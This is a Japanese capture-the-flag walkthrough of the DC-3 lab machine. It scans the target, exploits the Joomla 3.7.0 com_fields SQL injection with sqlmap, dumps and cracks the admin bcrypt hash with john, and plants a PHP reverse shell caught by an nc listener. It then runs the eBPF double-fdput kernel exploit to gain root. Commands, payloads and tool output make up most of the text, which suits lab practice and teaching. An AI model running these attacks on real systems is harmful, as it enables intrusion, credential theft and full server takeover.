攻撃者は、kaliを使ってます。
今回の攻撃の流れ
・攻撃される側のIPやウェブディレクトリを調べる
・脆弱性をついた攻撃(SQLインジェクション)で、ユーザー名とパスワードを取得
・CMSへのログイン
・リバースシェルをつくる
・リバースシェル経由でWEBサーバーにログイン
・権限昇格の脆弱性を探す/攻撃
・root権限にて/rootに侵入し、フラグをゲットする。
まずは、定番の攻撃される側のipとnmapの実施
Currently scanning: 192.168.10.0/16 | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 5 hosts. Total size: 324
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.3.1 30:f7:72:be:b9:b9 1 42 Hon Hai Precision Ind. Co.,Ltd.
192.168.3.2 10:6f:3f:e6:28:40 2 120 BUFFALO.INC
192.168.3.12 70:bc:10:6a:f6:c1 1 42 Microsoft Corporation
192.168.3.20 08:00:27:ab:aa:6e 1 60 PCS Systemtechnik GmbH
192.168.3.16 44:09:b8:8c:f4:72 1 60 Salcomp (Shenzhen) CO., LTD.
┌──(root💀snowyowl)-[~/dirsearch]
└─# nmap -sS -A -Pn 192.168.3.20 -p- 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-03 12:09 JST
Nmap scan report for 192.168.3.20
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 08:00:27:AB:AA:6E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.3.20
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
DC-3がWebサーバーだと分かったので、niktoとdirsearchで公開webディレクトリを探索する。
┌──(root💀snowyowl)-[~/dirsearch]
└─# nikto -h 192.168.3.20
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.20
+ Target Hostname: 192.168.3.20
+ Target Port: 80
+ Start Time: 2021-09-03 12:09:49 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8726 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2021-09-03 12:11:01 (GMT9) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀snowyowl)-[~/dirsearch]
└─
banner.txt db Dockerfile logs requirements.txt static
CHANGELOG.md default.conf __init__.py README.md setup.cfg thirdparty
CONTRIBUTORS.md dirsearch.py lib reports setup.py
┌──(root💀snowyowl)-[~/dirsearch]
└─
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/dirsearch/reports/192.168.3.20/-_21-09-03_12-11-29.txt
Error Log: /root/dirsearch/logs/errors-21-09-03_12-11-29.log
Target: http://192.168.3.20/
[12:11:29] Starting:
[12:11:32] 403 - 298B - /.ht_wsr.txt
[12:11:32] 403 - 301B - /.htaccess.bak1
[12:11:32] 403 - 301B - /.htaccess.orig
[12:11:32] 403 - 303B - /.htaccess.sample
[12:11:32] 403 - 301B - /.htaccess.save
[12:11:32] 403 - 301B - /.htaccess_orig
[12:11:32] 403 - 300B - /.htaccessOLD2
[12:11:32] 403 - 299B - /.htaccess_sc
[12:11:32] 403 - 302B - /.htaccess_extra
[12:11:32] 403 - 291B - /.htm
[12:11:32] 403 - 299B - /.htaccessOLD
[12:11:32] 403 - 299B - /.htaccessBAK
[12:11:32] 403 - 292B - /.html
[12:11:32] 403 - 298B - /.httr-oauth
[12:11:32] 403 - 297B - /.htpasswds
[12:11:32] 403 - 301B - /.htpasswd_test
[12:11:33] 403 - 291B - /.php
[12:11:33] 403 - 292B - /.php3
[12:11:37] 200 - 18KB - /LICENSE.txt
[12:11:37] 200 - 4KB - /README.txt
[12:11:47] 301 - 320B - /administrator -> http://192.168.3.20/administrator/
[12:11:47] 403 - 310B - /administrator/.htaccess
[12:11:47] 200 - 2KB - /administrator/includes/
[12:11:47] 200 - 31B - /administrator/cache/
[12:11:47] 200 - 5KB - /administrator/
[12:11:47] 301 - 325B - /administrator/logs -> http://192.168.3.20/administrator/logs/
[12:11:47] 200 - 31B - /administrator/logs/
[12:11:47] 200 - 5KB - /administrator/index.php
[12:11:51] 301 - 310B - /bin -> http://192.168.3.20/bin/
[12:11:51] 200 - 31B - /bin/
[12:11:52] 200 - 31B - /cache/
[12:11:52] 301 - 312B - /cache -> http://192.168.3.20/cache/
[12:11:53] 200 - 31B - /cli/
[12:11:53] 301 - 317B - /components -> http://192.168.3.20/components/
[12:11:53] 200 - 31B - /components/
[12:11:54] 200 - 0B - /configuration.php
[12:12:02] 200 - 3KB - /htaccess.txt
[12:12:03] 301 - 313B - /images -> http://192.168.3.20/images/
[12:12:03] 200 - 31B - /images/
[12:12:03] 301 - 315B - /includes -> http://192.168.3.20/includes/
[12:12:03] 200 - 31B - /includes/
[12:12:04] 200 - 8KB - /index.php
[12:12:06] 301 - 315B - /language -> http://192.168.3.20/language/
[12:12:06] 200 - 31B - /layouts/
[12:12:06] 200 - 31B - /libraries/
[12:12:06] 301 - 316B - /libraries -> http://192.168.3.20/libraries/
[12:12:09] 301 - 312B - /media -> http://192.168.3.20/media/
[12:12:09] 200 - 31B - /media/
[12:12:10] 301 - 314B - /modules -> http://192.168.3.20/modules/
[12:12:10] 200 - 31B - /modules/
[12:12:17] 200 - 31B - /plugins/
[12:12:17] 301 - 314B - /plugins -> http://192.168.3.20/plugins/
[12:12:20] 200 - 836B - /robots.txt.dist
[12:12:22] 403 - 300B - /server-status
[12:12:22] 403 - 301B - /server-status/
[12:12:27] 301 - 316B - /templates -> http://192.168.3.20/templates/
[12:12:27] 200 - 31B - /templates/
[12:12:27] 200 - 0B - /templates/beez3/
[12:12:27] 200 - 31B - /templates/index.html
[12:12:27] 200 - 0B - /templates/protostar/
[12:12:27] 200 - 0B - /templates/system/
[12:12:28] 301 - 310B - /tmp -> http://192.168.3.20/tmp/
[12:12:29] 200 - 31B - /tmp/
[12:12:32] 200 - 2KB - /web.config.txt
Task Completed
また、このCMS(Joomla)専用のセキュリティツールがあるのでそれを使って詳細を調べる。
┌──(root💀snowyowl)-[~/dirsearch]
└─# joomscan -u http://192.168.20/
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.3.20/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.3.20/administrator/components
http://192.168.3.20/administrator/modules
http://192.168.3.20/administrator/templates
http://192.168.3.20/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.3.20/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.3.20/
上に実行してきた結果から、Joomlaのバージョンが分かったので、それに関する脆弱性をついたものがないのか調べる。
┌──(root💀snowyowl)-[~]
└─# searchsploit "Joomla 3.7.0"
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
SQLインジェクションが見つかった。
www.exploit-db.com
SQLインジェクションのテンプレが書いてあるのでこれを使用する。↓
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
実際に使っていくfullorderingは、ここはこのまま使う。
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:25:55 /2021-09-03/
[12:25:55] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:25:55] [INFO] resuming back-end DBMS 'mysql'
[12:25:55] [INFO] testing connection to the target URL
[12:25:55] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=pt7u81sacce...hsvbocmn87'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:25:59] [INFO] fetching database names
[12:25:59] [INFO] resumed: 'information_schema'
[12:25:59] [INFO] resumed: 'joomladb'
[12:25:59] [INFO] resumed: 'mysql'
[12:25:59] [INFO] resumed: 'performance_schema'
[12:25:59] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[12:25:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:25:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:25:59 /2021-09-03/
データベースが分かったので、そのなかのjoomladbの中のテーブルを表示する。
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables
___
__H__
___ ___[.]_____ ___ ___ {1.5.7#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:28:57 /2021-09-03/
[12:28:57] [INFO] fetched random HTTP User-Agent header value 'Opera/9.00 (X11; Linux i686; U; de)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:28:57] [INFO] resuming back-end DBMS 'mysql'
[12:28:57] [INFO] testing connection to the target URL
[12:28:58] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=shu32a83a3i...vqs1g25h14'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:29:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:29:00] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+---------------------+
[12:29:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:29:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:29:00 /2021-09-03/
usersのテーブルが怪しいので、ここの中にuser名とpasswordのカラムがないかを調べて、あったら表示される。
┌──(root💀snowyowl)-[~]
└─# sqlmap -u "http://192.168.3.20/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.7#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:37:44 /2021-09-03/
[12:37:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:37:44] [INFO] resuming back-end DBMS 'mysql'
[12:37:44] [INFO] testing connection to the target URL
[12:37:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8d3l6tqthp3...9qk5fv1qh4'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1743,CONCAT(0x2e,0x717a787871,(SELECT (ELT(1743=1743,1))),0x71626b6a71),2253))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9285 FROM (SELECT(SLEEP(5)))oGde)
---
[12:37:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[12:37:46] [INFO] fetching tables for database: 'joomladb'
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
[12:37:46] [INFO] fetching entries of column(s) 'name,password' for table '#__users' in database 'joomladb'
[12:37:46] [INFO] resumed: 'admin'
[12:37:46] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
Database: joomladb
Table: #__users
[1 entry]
+-------+--------------------------------------------------------------+
| name | password |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+
[12:37:46] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.20/dump/joomladb/#__users.csv'
[12:37:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:37:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.20'
[*] ending @ 12:37:46 /2021-09-03/
表示されたので、adminのpasswordをjohnを使って解読する。
$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
これをjohnで解析すると、admin:snoopyと分かる。
そこで、このユーザー名とパスワードを使ってサイトにログインする。
ログインできた
リバースシェルをつくる。
index2.phpを新しく作って、これをリバースシェルにする。
リバースシェルの作成、及びペイロード↓
┌──(root💀snowyowl)-[~]
└─# locate php-reverse-shell.php
/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
┌──(root💀snowyowl)-[~]
└─# nc -lvp 666
無事にペイロードができたので、少し探索してみようと思う。
/etc/passwdにパスワードがハッシュ値で書かれている場合が多いので、まずはここをチェックする。
meterpreter > cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
しかし、全てnologinとなっていて全く特権昇格の手がかりが見られない。
このサーバーのosバージョンを見てみる
meterpreter > cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
searchsploitで探すと、Ubuntu 16.04の脆弱性を利用したコードがあった。
┌──(root💀snowyowl)-[~]
└─# searchsploit "Ubuntu 16.04"
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-vid | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/2 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arb | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metas | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poi | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out- | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' R | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) P | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privile | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escala | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Lo | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privile | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zo | linux/local/47169.c
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
この中でも、特権昇格に関するコードは、Local Privilege Escalationと書かれているものである。
そのため、今回はlinux/local/39772.txtを使っていく。
www.exploit-db.com
/tmpは、権限が一番下のレベルなのでここにwgetでダウンロードするとうまく行く
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ cd 39772
$ ls
crasher.tar
exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ cd ebpf_mapfd_doubleput_exploit
$ ls
compile.sh
doubleput.c
hello.c
suidhelper.c
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
rootになれた
cd /root
ls
the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!